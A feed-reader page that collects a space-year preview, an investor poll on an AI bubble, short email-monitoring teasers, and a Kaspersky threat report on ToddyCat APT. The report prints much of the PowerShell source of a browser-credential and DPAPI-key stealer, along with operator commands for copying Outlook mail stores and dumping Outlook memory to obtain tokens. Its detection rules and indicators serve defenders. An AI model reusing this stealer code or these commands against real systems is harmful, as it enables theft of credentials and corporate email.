Reading view

There are new articles available, click to refresh the page.

Year in Space: Get ready for moon missions to take center stage in 2026

Illustration: Orion engine firing during lunar flyby
An artist’s conception shows the Orion spacecraft’s main engine firing during a lunar flyby, surrounded by eight auxiliary engines built by L3Harris’ Aerojet Redmond facility. (NASA Illustration)

Lunar missions once felt like the domain of history books rather than current events, but an upcoming trip around the moon is poised to generate headlines at a level not seen since the Apollo era.

NASA’s Artemis 2 mission, which is due to launch four astronauts on a round-the-moon journey as a warmup for a future lunar landing, is shaping up as the spaceflight highlight of 2026. NASA Administrator Jared Isaacman, who took the agency’s helm this month after a tumultuous year, says it’s the top item on his must-see list.

“What’s not to be excited about?” he said last week on CNBC. “We’re sending American astronauts around the moon. It’s the first time we’ve done that in a half-century. … We’re weeks away, potentially a month or two away at most from sending American astronauts around the moon again.”

The Pacific Northwest plays a significant role in the back-to-moon campaign. For example, L3Harris Technologies’ team in Redmond, Wash., built thrusters for Artemis 2’s Orion crew vehicle. And Artemis 2 isn’t the only upcoming moon mission with Seattle-area connections: Jeff Bezos’ Blue Origin space venture, headquartered in Kent, plans to send an uncrewed Blue Moon Mark 1 lander to the lunar surface in 2026 to help NASA get set for future moon trips.

“We are taking our first steps to help open up the lunar frontier for all of humanity,” Paul Brower, Blue Origin’s director of lunar operations, said in a recent LinkedIn post.

2026 could also be the year when Seattle-based Interlune sends its first prospecting instrument to the lunar surface to hunt for signs of helium-3, a rare material the company aims to bring back to Earth for use in fusion reactors or quantum computers.

As we close out 2025, here’s a look back at five of the past year’s space milestones and five trends to watch in the year to come.

Looking back at 2025

Blue Origin goes orbital: After a decade of development, Blue Origin launched its orbital-class New Glenn rocket for the first time in January, on a mission that lofted test equipment for its Blue Ring space mobility platform into orbit. A second launch in November sent NASA’s Escapade probes toward Mars and marked the first successful at-sea recovery of a New Glenn booster. On the suborbital side, Blue Origin’s New Shepard program provided rides to space for seven crews. Notable passengers included Lauren Sanchez, who became Bezos’ wife two months after her flight; Justin Sun, the crypto entrepreneur who paid $28 million for his space ticket; and Michaela Benthaus, the first wheelchair user to fly to space.

Amazon’s satellite network gets down to business: The first operational satellites for Amazon’s space-based broadband internet service were launched in April. The network’s name was changed from Project Kuiper to Amazon Leo in November. Terminals have been shipped to early-stage customers for a preview program, and the rollout is expected to gather steam in 2026. Meanwhile, SpaceX continues to grow its Starlink network, with more than 9,300 satellites providing high-speed internet service to more than 9 million customers worldwide.

Rubin Observatory delivers first images: A decade and a half ago, Microsoft’s Bill Gates and Charles Simonyi donated $30 million to support the creation of a giant sky-survey telescope in Chile. in June, the Rubin Observatory finally made its star-studded debut, with Simonyi in attendance. Researchers at the University of Washington played key roles in shepherding the $800 million project to completion.

A first for orbital data centers: Redmond-based Starcloud sent an Nvidia GPU chip into orbit in November, and weeks later it claimed to be the first company to train an artificial intelligence model in space. The achievement marked one small step in Starcloud’s campaign to create a network of data centers in orbit. Several tech titans — including Bezos, OpenAI’s Sam Altman, SpaceX’s Elon Musk and Google’s Sundar Pichai — see orbital data centers as a way to satisfy the growing hunger for AI processing resources on Earth. Some say the trend is driving SpaceX’s plans to go public in 2026.

SpaceX’s Starship goes through ups and downs: Many of SpaceX’s ambitions, ranging from orbital data centers to moon landings to Mars migrations, depend on the successful development of its Starship super-rocket. Starship also plays a crucial role in the business models for lots of space startups, including Starcloud and a Seattle-based space travel venture called Orbite. Three Starship test flights ended badly in the first half of 2025, but SpaceX bounced back with two successful test flights in the second half of the year. Now SpaceX is working on an upgraded version of Starship — and dealing with the aftermath of a booster anomaly that occurred during a pressurization test in November.

Looking ahead to 2026

Artemis 2 to send humans around the moon: For the first time since Apollo 17 in 1972, humans will leave Earth orbit. The current plan calls for the Artemis 2 mission to take place in the February-to-April time frame. A crew of four — three Americans and one Canadian astronaut — will climb into the Orion spacecraft and be sent into space atop NASA’s Space Launch System rocket. The round-the-moon route will be similar to the trajectory used for NASA’s uncrewed Artemis 1 flight in 2022. If Artemis 2 goes well, that could set the stage for an Artemis 3 crewed lunar landing as early as 2027 (but more likely later).

Jeff Bezos and Blue Origin team standing in front of Blue Moon lunar lander
Jeff Bezos and Blue Origin employees pose for a picture in front of the Blue Moon Mark 1 lunar lander. (Blue Origin Photo)

Blue Moon’s lunar delivery: Blue Origin’s uncrewed lander is tasked with delivering a NASA experiment called SCALPSS to the moon’s south polar region. Stereo cameras will document how the landing burn interacts with the dusty lunar surface — and the results will be factored into plans for future landings. This Blue Moon Mark 1 mission will blaze a trail for Blue Origin’s Mark 2 lander, which is due to start taking astronauts to the lunar surface in 2030. Other robotic spacecraft scheduled for moon landings in 2026 include China’s Chang’e 7 rover, Firefly’s Blue Ghost 2 lander, Intuitive Machines’ IM-3 lander and Astrobotic’s Griffin lander (which will be carrying two mini-rovers and Interlune’s helium-hunting camera).

Seattle space companies count down to liftoff: In addition to Blue Origin, several other companies headquartered near the Emerald City are planning big space missions in 2026. Kent-based Stoke Space could launch its first fully reusable Nova rocket from Florida. Bothell-based Portal Space Systems’ Starburst space vehicle is due to make its orbital debut. And Tukwila-based Starfish Space is scheduled to demonstrate how its maneuverable Otter spacecraft can give satellites an in-space boost.

Golden Dome takes shape: A proposed $175 billion missile defense system known as the Golden Dome is already attracting interest from space ventures — particularly ventures that are focusing on in-space mobility (such as Portal Space and Starfish Space) or in-space data processing (such as Starcloud and Seattle-based Sophia Space). Marysville, Wash.-based Gravitics is building an orbital carrier that would serve as a “pre-positioned launch pad in space” for the U.S. Space Force, under the terms of a deal that could be worth as much as $60 million. Other big-ticket military projects are likely to come to light in 2026.

Whither NASA? Or will NASA wither? Isaacman is taking over at NASA following a year of layoffs and science program cuts. He has pledged to land astronauts on the moon during the current presidential term, but funding remains a hurdle. “I almost guarantee you he’s going to be walking up the street to the White House, saying ‘I really need more money,’” NASAWatch’s Keith Cowing said on Israel’s i24 TV.

Bonus: Coming to a sky (or a screen) near you: Keep an eye out for a total lunar eclipse on March 3 that will be visible over the U.S., weather permitting. There’s also a solar eclipse on Aug. 12 that will bring totality to narrow stretches of Greenland, Iceland and Spain. Although this eclipse can’t be seen in Seattle’s skies, you should be able to catch the highlights online.

Is there an AI bubble? Investors sound off on risks and opportunities for tech startups in 2026

From top left, clockwise: Sheila Gulati, Cameron Borumand, Annie Luchsinger, Chris DeVore, Sabrina Albers (Wu), and Andy Liu.

AI has attracted unprecedented levels of capital and attention. And questions are growing about the so-called AI bubble: Are too many startups chasing the same ideas? Are valuations running ahead of real adoption? And will all this investment pay off — or pop?

GeekWire polled a handful of Seattle-area venture capitalists about whether they think an AI bubble exists, and how startups should prepare as they plan for 2026.

Taken together, the investors paint a picture of a market that is overheated in places, but far from broken. They see clear signs of excess in AI — especially in early-stage private companies where valuations often outpace real traction. But they largely reject the idea of a catastrophic bubble, and most argue that the technology itself is already delivering real value.

They differ on the details: Some see the biggest excess in data center buildouts. Others point to narrative-driven startups raising at huge valuations without real customer traction. One investor puts AI’s full impact 10 to 20 years out. Another sees immediate opportunity as companies rethink their software spending, making longtime vendors vulnerable.

Their advice to startup founders: ignore the hype, focus on real customer problems, build durable revenue and efficient businesses, and be ready for some market cooling.

Read their full responses below.

Sabrina Albert (Wu), partner at Madrona

Sabrina Albert (Wu). (Madrona Photo)

“There’s clear froth in parts of the AI market, especially in early-stage private valuations where companies are priced well ahead of fundamentals, which fits a classic ‘bubble’ definition. In the public markets, the strongest AI companies are backing valuations with outsized earnings and growth, so it doesn’t look like a traditional bubble there.

The most pronounced exuberance is in the private markets, particularly at seed and Series A, where many investors are trying to get in earlier on AI exposure. As a result, capital is chasing startups with limited traction and valuations that price in outcomes that may take years of execution to justify.

Startups should focus on durable business fundamentals early on. Build repeatable revenue through annual or multi-year contracts, solve real customer problems, and differentiate by integrating deeply into the customer tech stack to create real product and company flywheels. Long-term success comes from delivering measurable value and defensible growth over time.”

Cameron Borumand, general partner at Fuse

Cameron Borumand. (Fuse Photo)

“Many factors are at play here. You have a new and genuinely transformative technology in AI. Over the long term, it will radically reshape how nearly every industry operates. At the same time, history tells us that new technologies tend to be overestimated in the short term and underestimated in the long term. The most profound, fully realized impacts of AI may still be 10-to-20 years away.

In the near term (the next few years), I expect some pullback in the public markets as investors come to terms with the fact that true ‘enterprise readiness’ for AI will take time. This doesn’t suggest anything catastrophic — just that the roughly 21 percent year-over-year growth we’ve seen in the Nasdaq is unlikely to be sustainable and may revert closer to the 30-year average of around 10 percent. After a few meaningful pullbacks, pundits will inevitably claim that AI is overhyped. In reality, this would simply represent a normalization after an extraordinary, AI-fueled run in the public markets.

Late-stage private markets will see some overly hyped companies — this happens in every boom cycle. The winners will be bigger than ever, but the losses will also be bigger than ever. When you have companies like Anthropic growing from $1 billion to a projected $9 billion of revenue in 2025, it’s clear that AI is already delivering real, material impact in the world.

For startups, there’s no better time to be building than now. M&A markets are back, customers have budget, and talent wants to work on interesting projects. With that said, there is a lot of noise, so it’s best to go deep and really focus on a core customer problem. Most of the growth we’ve seen to date is in the infrastructure layer — the next few years will be about the next generation of AI-powered applications.”

Chris DeVore, founding managing partner at Founders’ Co-op

Chris DeVore speaks at the GeekWire Summit in 2022. (GeekWire File Photo / Dan DeLong)

“Yes, a significant amount of capital being deployed globally in AI (and particularly in the data center buildout) is almost certainly being misallocated. Specifically in startups, outside a few presumed winners (OpenAI, Anthropic, Cursor), the concern is less overcapitalization and more the prices at which financings are being done relative to the actual cash flows and margin potential of the companies being financed.

That said, unlike some recent bubbles I can think of (crypto, metaverse, etc.) there are actual babies in the bathwater this time. LLMs are remarkably capable tools even at their current state of development, and will remain core to many software development and knowledge work tasks long after rationality has returned to the financial landscape.

The founder and investor challenge in moments like the current one is how to make decisions that will look smart ten years from now, not just in the current moment. Are there ways to apply LLMs to create durable business value in segments of the economy that are not likely to be overcapitalized or competed to zero by the near-term flood of dollars? The only alternative strategy is to try to pick winners in the capital wars and pay whatever the market demands for those assets, but history suggests that’s a very low odds proposition for even the best players.

The recipe for success in times like this is not that different from any other time: pick a customer segment that you understand better than anyone else, engage deeply with those customers to understand what problems you can uniquely solve with LLMs that were too hard or expensive to solve previously, build quickly and iteratively to show value to those customers, and maintain that pace of shipping and learning for as long as you can.

That may sound simple, but it’s remarkable how few founding teams are able to pull it off, and that why startups are so hard, and so fun.”

Sheila Gulati, managing director at Tola Capital

Sheila Gulati of Tola Capital. (GeekWire File Photo)

“Broadly, I don’t think we’re in an AI bubble right now. Similar concerns existed when we launched the Azure platform about fifteen years ago. Back then, people were initially worried about racing to a zero-margin business. 

Today’s massive AI infrastructure buildouts will shape the operational software layers that drive real-world performance — compute orchestration, data pipelines, memory systems, and large-scale inference efficiency. Value is shifting toward packaging and deploying intelligence across enterprise workflows. 

Enterprise software startups should position themselves in the growing TAM of delivering full, end-to-end solutions and new ways of doing things where humans collaborate with AI agents. Winning startups will encompass both the growing IT TAM and economics of a portion of the labor market as well.

We are now seeing unprecedented malleability of CIO budgets. The deeply entrenched application stack can now shift to new players which are built with AI from the ground up. The market opportunity is massive, and companies should set their sights on building the new megacaps, not minor feature companies.”

Andy Liu, co-founding partner at Unlock Venture Partners

Andy Liu.

“Yes, we are in an AI bubble, but not in the way most people think.

Capital and valuations are running well ahead of fundamentals, particularly for companies without clear customer pull, durable differentiation, or credible/reasonable paths to profitability. We’re seeing a growing gap between narrative-driven AI companies where ‘AI’ is largely a positioning exercise, and value-driven AI companies that use the technology to deliver measurable, repeatable value for customers.

The bubble seems most pronounced at the early and growth stages where AI storytelling can temporarily substitute for traction and raise capital at lofty valuations. Some strong companies will emerge from this cycle, but there will be meaningful drawdowns, recaps, or shutdowns as many startups fail to grow into those expectations.

Looking ahead to 2026, my advice to founders is straightforward:

  • Build real businesses, not decks. Products today can be built quickly with real revenue before raising capital.
  • Prioritize efficiency, customer ROI, and unit economics.
  • Use AI to create real leverage, not excuses for burning capital.

2026 is going to be an incredible moment to build. The cost of experimentation and building products has collapsed, and founders no longer need educational credentials (CS degrees or an MBA) to create real products and revenue. The next generation of durable AI companies will be built by small teams who focus less on hype and more on efficient execution. We’re definitely excited to see more teams building incredible products this upcoming year.”

Annie Luchsinger, partner at Breakers

Annie Luchsinger.

“From my perspective, what we’re seeing is less an AI bubble and more a classic venture cycle playing out around a genuinely transformative platform shift. Venture has always adapted to new normals alongside major technology inflections (cloud, mobile, social), and AI is the fastest-moving one we’ve seen to date.

The difference this time is speed, scale, and capital availability. AI adoption is happening at a faster clip and at a much larger scale than prior platform shifts, all while private-market capital has reached historic highs. As those forces collide, pricing, timelines, and investor behavior evolve.

Capital moving ahead of fundamentals is not new. There will be some shakeouts, but that doesn’t mean underlying value creation isn’t happening. Companies with real technology, real distribution, and real customers will endure.”

ToddyCat: your hidden email assistant. Part 1

Introduction

Email remains the main means of business correspondence at organizations. It can be set up either using on-premises infrastructure (for example, by deploying Microsoft Exchange Server) or through cloud mail services such as Microsoft 365 or Gmail. However, some organizations do not provide domain-level access to their cloud email. As a result, attackers who have compromised the domain do not automatically gain access to email correspondence and must resort to additional techniques to read it.

This research describes how ToddyCat APT evolved its methods to gain covert access to the business correspondence of employees at target companies. In the first part, we review the incidents that occurred in the second half of 2024 and early 2025. In the second part of the report, we focus in detail on how the attackers implemented a new attack vector as a result of their efforts. This attack enables the adversary to leverage the user’s browser to obtain OAuth 2.0 authorization tokens. These tokens can then be utilized outside the perimeter of the compromised infrastructure to access corporate email.

Additional information about this threat, including indicators of compromise, is available to customers of the Kaspersky Intelligence Reporting Service. Contact: intelreports@kaspersky.com.

TomBerBil in PowerShell

In a previous post on the ToddyCat group, we described the TomBerBil family of tools, which are designed to extract cookies and saved passwords from browsers on user hosts. These tools were written in C# and C++.

Yet, analysis of incidents from May to June 2024 revealed a new variant implemented in PowerShell. It retained the core malicious functionality of the previous samples but employed a different implementation approach and incorporated new commands.

A key feature of this version is that it was executed on domain controllers on behalf of a privileged user, accessing browser files via shared network resources using the SMB protocol.

Besides supporting the Chrome and Edge browsers, the new version also added processing for Firefox browser files.

The tool was launched using a scheduled task that executed the following command line:

powershell -exec bypass -command "c:\programdata\ip445.ps1"

The script begins by creating a new local directory, which is specified in the $baseDir variable. The tool saves all data it collects into this directory.

$baseDir = 'c:\programdata\temp\'

try{
	New-Item -ItemType directory -Path $baseDir | Out-Null
}catch{
	
}

The script defines a function named parseFile, which accepts the full file path as a parameter. It opens the C:\programdata\uhosts.txt file and reads its content line by line using .NET Framework classes, returning the result as a string array. This is how the script forms an array of host names.

function parseFile{
    param(
        [string]$fileName
    )
    
    $fileReader=[System.IO.File]::OpenText($fileName)

    while(($line = $fileReader.ReadLine()) -ne $null){
        try{
            $line.trim()
            }
        catch{
        }
    }
    $fileReader.close()
}

For each host in the array, the script attempts to establish an SMB connection to the shared resource c$, constructing the path in the \\\c$\users\ format. If the connection is successful, the tool retrieves a list of user directories present on the remote host. If at least one directory is found, a separate folder is created for that host within the $baseDir working directory:

foreach($myhost in parseFile('c:\programdata\uhosts.txt')){
    $myhost=$myhost.TrimEnd()
    $open=$false
    
    $cpath = "\\{0}\c$\users\" -f $myhost
    $items = @(get-childitem $cpath -Force -ErrorAction SilentlyContinue)
	
	$lpath = $baseDir + $myhost
	try{
		New-Item -ItemType directory -Path $lpath | Out-Null
	}catch{
		
	}

In the next stage, the script iterates through the user folders discovered on the remote host, skipping any folders specified in the $filter_users variable, which is defined upon launching the tool. For the remaining folders, three directories are created in the script’s working folder for collecting data from Google Chrome, Mozilla Firefox, and Microsoft Edge.

$filter_users = @('public','all users','default','default user','desktop.ini','.net v4.5','.net v4.5 classic')

foreach($item in $items){
	
	$username = $item.Name
	if($filter_users -contains $username.tolower()){
		continue
	}
	$upath = $lpath + '\' + $username
	
	try{
		New-Item -ItemType directory -Path $upath | Out-Null
		New-Item -ItemType directory -Path ($upath + '\google') | Out-Null
		New-Item -ItemType directory -Path ($upath + '\firefox') | Out-Null
		New-Item -ItemType directory -Path ($upath + '\edge') | Out-Null
	}catch{
		
	}

Next, the tool uses the default account to search for the following Chrome and Edge browser files on the remote host:

  • Login Data: a database file that contains the user’s saved logins and passwords for websites in an encrypted format
  • Local State: a JSON file containing the encryption key used to encrypt stored data
  • Cookies: a database file that stores HTTP cookies for all websites visited by the user
  • History: a database that stores the browser’s history

These files are copied via SMB to the local folder within the corresponding user and browser folder hierarchy. Below is a code snippet that copies the Login Data file:

$googlepath = $upath + '\google\'
$firefoxpath = $upath + '\firefox\'
$edgepath = $upath + '\edge\'
$loginDataPath = $item.FullName + "\AppData\Local\Google\Chrome\User Data\Default\Login Data"
if(test-path -path $loginDataPath){
	$dstFileName = "{0}\{1}" -f $googlepath,'Login Data'
	copy-item -Force -Path $loginDataPath -Destination $dstFileName | Out-Null
}

The same procedure is applied to Firefox files, with the tool additionally traversing through all the user profile folders of the browser. Instead of the files described above for Chrome and Edge, the script searches for files which have names from the $firefox_files array that contain similar information. The requested files are also copied to the tool’s local folder.

$firefox_files = @('key3.db','signons.sqlite','key4.db','logins.json')

$firefoxBase = $item.FullName + '\AppData\Roaming\Mozilla\Firefox\Profiles'
if(test-path -path $firefoxBase){
	$profiles = @(get-childitem $firefoxBase -Force -ErrorAction SilentlyContinue)
	foreach($profile in $profiles){
		if(!(test-path -path ($firefoxpath + '\' + $profile.Name))){
			New-Item -ItemType directory -Path ($firefoxpath + '\' + $profile.Name) | Out-Null
		}
		foreach($firefox_file in $firefox_files){
			$tmpPath = $firefoxBase + '\' + $profile.Name + '\' + $firefox_file
			if(test-path -Path $tmpPath){
				$dstFileName = "{0}\{1}\{2}" -f $firefoxpath,$profile.Name,$firefox_file
				copy-item -Force -Path $tmpPath -Destination $dstFileName | Out-Null
			}
		}
	}
}

The copied files are encrypted using the Data Protection API (DPAPI). The previous version of TomBerBil ran on the host and copied the user’s token. As a result, in the user’s current session DPAPI was used to decrypt the master key, and subsequently, the files. The updated server-side version of TomBerBil copies files containing the user encryption keys that are used by DPAPI. These keys, combined with the user’s SID and password, grant the attackers the ability to decrypt all the copied files locally.

if(test-path -path ($item.FullName + '\AppData\Roaming\Microsoft\Protect')){
	copy-item -Recurse -Force -Path ($item.FullName + '\AppData\Roaming\Microsoft\Protect') -Destination ($upath + '\') | Out-Null
}
if(test-path -path ($item.FullName + '\AppData\Local\Microsoft\Credentials')){
	copy-item -Recurse -Force -Path ($item.FullName + '\AppData\Local\Microsoft\Credentials') -Destination ($upath + '\') | Out-Null
}

With TomBerBil, the attackers automatically collected user cookies, browsing history, and saved passwords, while simultaneously copying the encryption keys needed to decrypt the browser files. The connection to the victim’s remote hosts was established via the SMB protocol, which significantly complicated the detection of the tool’s activity.

TomBerBil in PowerShell

TomBerBil in PowerShell

As a rule, such tools are deployed at later stages, after the adversary has established persistence within the organization’s internal infrastructure and obtained privileged access.

Detection

To detect the implementation of this attack, it’s necessary to set up auditing for access to browser folders and to monitor network protocol connection attempts to those folders.

title: Access To Sensitive Browser Files Via Smb
id: 9ac86f68-9c01-4c9d-897a-4709256c4c7b
status: experimental
description: Detects remote access attempts to browser files containing sensitive information
author: Kaspersky
date: 2025-08-11
tags:
    - attack.credential-access
    - attack.t1555.003
logsource:
    product: windows
    service: security
detection:
    event:
        EventID: '5145'
    chromium_files:
        ShareLocalPath|endswith:
            - '\User Data\Default\History'
            - '\User Data\Default\Network\Cookies'
            - '\User Data\Default\Login Data'
            - '\User Data\Local State'
    firefox_path:
        ShareLocalPath|contains: '\AppData\Roaming\Mozilla\Firefox\Profiles'
    firefox_files:
        ShareLocalPath|endswith:
            - 'key3.db'
            - 'signons.sqlite'
            - 'key4.db'
            - 'logins.json'
    condition: event and (chromium_files or firefox_path and firefox_files)
falsepositives: Legitimate activity
level: medium

In addition, auditing for access to the folders storing the DPAPI encryption key files is also required.

title: Access To System Master Keys Via Smb
id: ba712364-cb99-4eac-a012-7fc86d040a4a
status: experimental
description: Detects remote access attempts to the Protect file, which stores DPAPI master keys
references:
    - https://www.synacktiv.com/en/publications/windows-secrets-extraction-a-summary
author: Kaspersky
date: 2025-08-11
tags:
    - attack.credential-access
    - attack.t1555
logsource:
    product: windows
    service: security
detection:
    selection:
        EventID: '5145'
        ShareLocalPath|contains: 'windows\System32\Microsoft\Protect'
    condition: selection
falsepositives: Legitimate activity
level: medium

Stealing emails from Outlook

The modified TomBerBil tool family proved ineffective at evading monitoring tools, compelling the threat actor to seek alternative methods for accessing the organization’s critical data. We discovered an attempt to gain access to corporate correspondence files in the local Outlook storage.

The Outlook application stores OST (Offline Storage Table) files for offline use. The names of these files contain the address of the mailbox being cached. Outlook uses OST files to store a local copy of data synchronized with mail servers: Microsoft Exchange, Microsoft 365, or Outlook.com. This capability allows users to work with emails, calendars, contacts, and other data offline, then synchronize changes with the server once the connection is restored.

However, access to an OST file is blocked by the application while Outlook is running. To copy the file, the attackers created a specialized tool called TCSectorCopy.

TCSectorCopy

This tool is designed for block-by-block copying of files that may be inaccessible by applications or the operating system, such as files that are locked while in use.

The tool is a 32-bit PE file written in C++. After launch, it processes parameters passed via the command line: the path to the source file to be copied and the path where the result should be saved. The tool then validates that the source path is not identical to the destination path.

Validating the TCSectorCopy command line parameters

Validating the TCSectorCopy command line parameters

Next, the tool gathers information about the disk hosting the file to be copied: it determines the cluster size, file system type, and other parameters necessary for low-level reading.

Determining the disk's file system type

Determining the disk’s file system type

TCSectorCopy then opens the disk as a device in read-only mode and sequentially copies the file content block by block, bypassing the standard Windows API. This allows the tool to copy even the files that are locked by the system or other applications.

The adversary uploaded this tool to target host and used it to copy user OST files:

xCopy.exe  C:\Users\<user>\AppData\Local\Microsoft\Outlook\<email>@<domain>.ost <email>@<domain>.ost2

Having obtained the OST files, the attackers processed them using a separate tool to extract the email correspondence content.

XstReader

XstReader is an open-source C# tool for viewing and exporting the content of Microsoft Outlook OST and PST files. The attackers used XstReader to export the content of the previously copied OST files.

XstReader is executed with the -e parameter and the path to the copied file. The -e parameter specifies the export of all messages and their attachments to the current folder in the HTML, RTF, and TXT formats.

XstExport.exe -e <email>@<domain>.ost2

After exporting the data from the OST file, the attackers review the list of obtained files, collect those of interest into an archive, and exfiltrate it.

 Stealing data with TCSectorCopy and XstReader

Stealing data with TCSectorCopy and XstReader

Detection

To detect unauthorized access to Outlook OST files, it’s necessary to set up auditing for the %LOCALAPPDATA%\Microsoft\Outlook\ folder and monitor access events for files with the .ost extension. The Outlook process and other processes legitimately using this file must be excluded from the audit.

title: Access To Outlook Ost Files
id: 2e6c1918-08ef-4494-be45-0c7bce755dfc
status: experimental
description: Detects access to the Outlook Offline Storage Table (OST) file
author: Kaspersky
date: 2025-08-11
tags:
    - attack.collection
    - attack.t1114.001
logsource:
    product: windows
    service: security
detection:
    event:
        EventID: 4663
    outlook_path:
        ObjectName|contains: '\AppData\Local\Microsoft\Outlook\'
    ost_file:
        ObjectName|endswith: '.ost'
    condition: event and outlook_path and ost_file
falsepositives: Legitimate activity
level: low

The TCSectorCopy tool accesses the OST file via the disk device, so to detect it, it’s important to monitor events such as Event ID 9 (RawAccessRead) in Sysmon. These events indicate reading directly from the disk, bypassing the file system.

As we mentioned earlier, TCSectorCopy receives the path to the OST file via a command line. Consequently, detecting this tool’s malicious activity requires monitoring for a specific OST file naming pattern: the @ symbol and the .ost extension in the file name.

Example of detecting TCSectorCopy activity in KATA

Example of detecting TCSectorCopy activity in KATA

Stealing access tokens from Outlook

Since active file collection actions on a host are easily tracked using monitoring systems, the attackers’ next step was gaining access to email outside the hosts where monitoring was being performed. Some target organizations used the Microsoft 365 cloud office suite. The attackers attempted to obtain the access token that resides in the memory of processes utilizing this cloud service.

In the OAuth 2.0 protocol, which Microsoft 365 uses for authorization, the access token is used when requesting resources from the server. In Outlook, it is specified in API requests to the cloud service to retrieve emails along with attachments. Its disadvantage is its relatively short lifespan; however, this can be enough to retrieve all emails from a mailbox while bypassing monitoring tools.

The access token is stored using the JWT (JSON Web Tokens) standard. The token content is encoded using Base64. JWT headers for Microsoft applications always specify the typ parameter with the JWT value first. This means that the first 18 characters of the encoded token will always be the same.

The attackers used SharpTokenFinder to obtain the access token from the user’s Outlook application. This tool is written in C# and designed to search for an access token in processes associated with the Microsoft 365 suite. After launch, the tool searches the system for the following processes:

  • “TEAMS”
  • “WINWORD”
  • “ONENOTE”
  • “POWERPNT”
  • “OUTLOOK”
  • “EXCEL”
  • “ONEDRIVE”
  • “SHAREPOINT”

If these processes are found, the tool attempts to open each process’s object using the OpenProcess function and dump their memory. To do this, the tool imports the MiniDumpWriteDump function from the dbghelp.dll file, which writes user mode minidump information to the specified file. The dump files are saved in the dump folder, located in the current SharpTokenFinder directory. After creating dump files for the processes, the tool searches for the following string pattern in each of them:

"eyJ0eX[a-zA-Z0-9\\._\\-]+"

This template uses the first six symbols of the encoded JWT token, which are always the same. Its structures are separated by dots. This is sufficient to find the necessary string in the process memory dump.

Example of a JWT Token

Example of a JWT Token

In the incident being described, the local security tools (EPP) blocked the attempt to create the OUTLOOK.exe process dump using SharpTokenFinder, so the operator used ProcDump from the Sysinternals suite for this purpose:

procdump64.exe -accepteula -ma OUTLOOK.exe
dir c:\windows\temp\OUTLOOK.EXE_<id>.dmp
c:\progra~1\winrar\rar.exe a -k -r -s -m5 -v100M %temp%\dmp.rar c:\windows\temp\OUTLOOK.EXE_<id>.dmp

Here, the operator executed ProcDump with the following parameters:

  • accepteula silently accepts the license agreement without displaying the agreement window.
  • ma indicates that a full process dump should be created.
  • exe is the name of the process to be dumped.

The dir command is then executed as a check to confirm that the file was created and is not zero size. Following this validation, the file is added to a dmp.rar archive using WinRAR. The attackers sent this file to their host via SMB.

Detection

To detect this technique, it’s necessary to monitor the ProcDump process command line for names belonging to Microsoft 365 application processes.

title: Dump Of Office 365 Processes Using Procdump
id: 5ce97d80-c943-4ac7-8caf-92bb99e90e90
status: experimental
description: Detects Office 365 process names in the command line of the procdump tool
author: kaspersky
date: 2025-08-11
tags:
    - attack.lateral-movement
    - attack.defense-evasion
    - attack.t1550.001
logsource:
  category: process_creation
  product: windows
detection:
    selection:
        Product: 'ProcDump'
        CommandLine|contains:
            - 'teams'
            - 'winword'
            - 'onenote'
            - 'powerpnt'
            - 'outlook'
            - 'excel'
            - 'onedrive'
            - 'sharepoint'
    condition: selection
falsepositives: Legitimate activity
level: high

Below is an example of the ProcDump tool from the Sysinternals package used to dump the Outlook process memory, detected by Kaspersky Anti Targeted Attack (KATA).

Example of Outlook process dump detection in KATA

Example of Outlook process dump detection in KATA

Takeaways

The incidents reviewed in this article show that ToddyCat APT is constantly evolving its techniques and seeking new ways to conceal its activity aimed at gaining access to corporate correspondence within compromised infrastructure. Most of the techniques described here can be successfully detected. For timely identification of these techniques, we recommend using both host-based EPP solutions, such as Kaspersky Endpoint Security for Business, and complex threat monitoring systems, such as Kaspersky Anti Targeted Attack. For comprehensive, up-to-date information on threats and corresponding detection rules, we recommend Kaspersky Threat Intelligence.

Indicators of compromise

Malicious files
55092E1DEA3834ABDE5367D79E50079A             ip445.ps1
2320377D4F68081DA7F39F9AF83F04A2              xCopy.exe
B9FDAD18186F363C3665A6F54D51D3A0             stf.exe

Not-a-virus files
49584BD915DD322C3D84F2794BB3B950             XstExport.exe

File paths
C:\programdata\ip445.ps1
C:\Windows\Temp\xCopy.exe
C:\Windows\Temp\XstExport.exe
c:\windows\temp\stf.exe

PDB
O:\Projects\Penetration\Tools\SectorCopy\Release\SectorCopy.pdb

How to Monitor Your Email Services

How To Monitor Email Services

Verifying email performance is more than the basic understanding of message flow. Outbound mail in the form of Simple Mail Transfer Protocol (SMTP) and inbound mail through MAPI or Microsoft’s Graph API only parts of email systems to monitor, usually through pings or basic delivery confirmations. Often, once email is moved to Exchange Online, even…

The post How to Monitor Your Email Services appeared first on Exoprise.

Microsoft Outlook Outage on 6th February EX512238

Unable to send, receive, or search email through Exchange Online? Microsoft Outlook suffered an outage for several hours last night, disrupting North America and worldwide email services. Proactive and Early Outage Detection Exoprise sensors first detected and confirmed the outage at 11.03 pm in our London region last night. There was a second outage at…

The post Microsoft Outlook Outage on 6th February EX512238 appeared first on Exoprise.

❌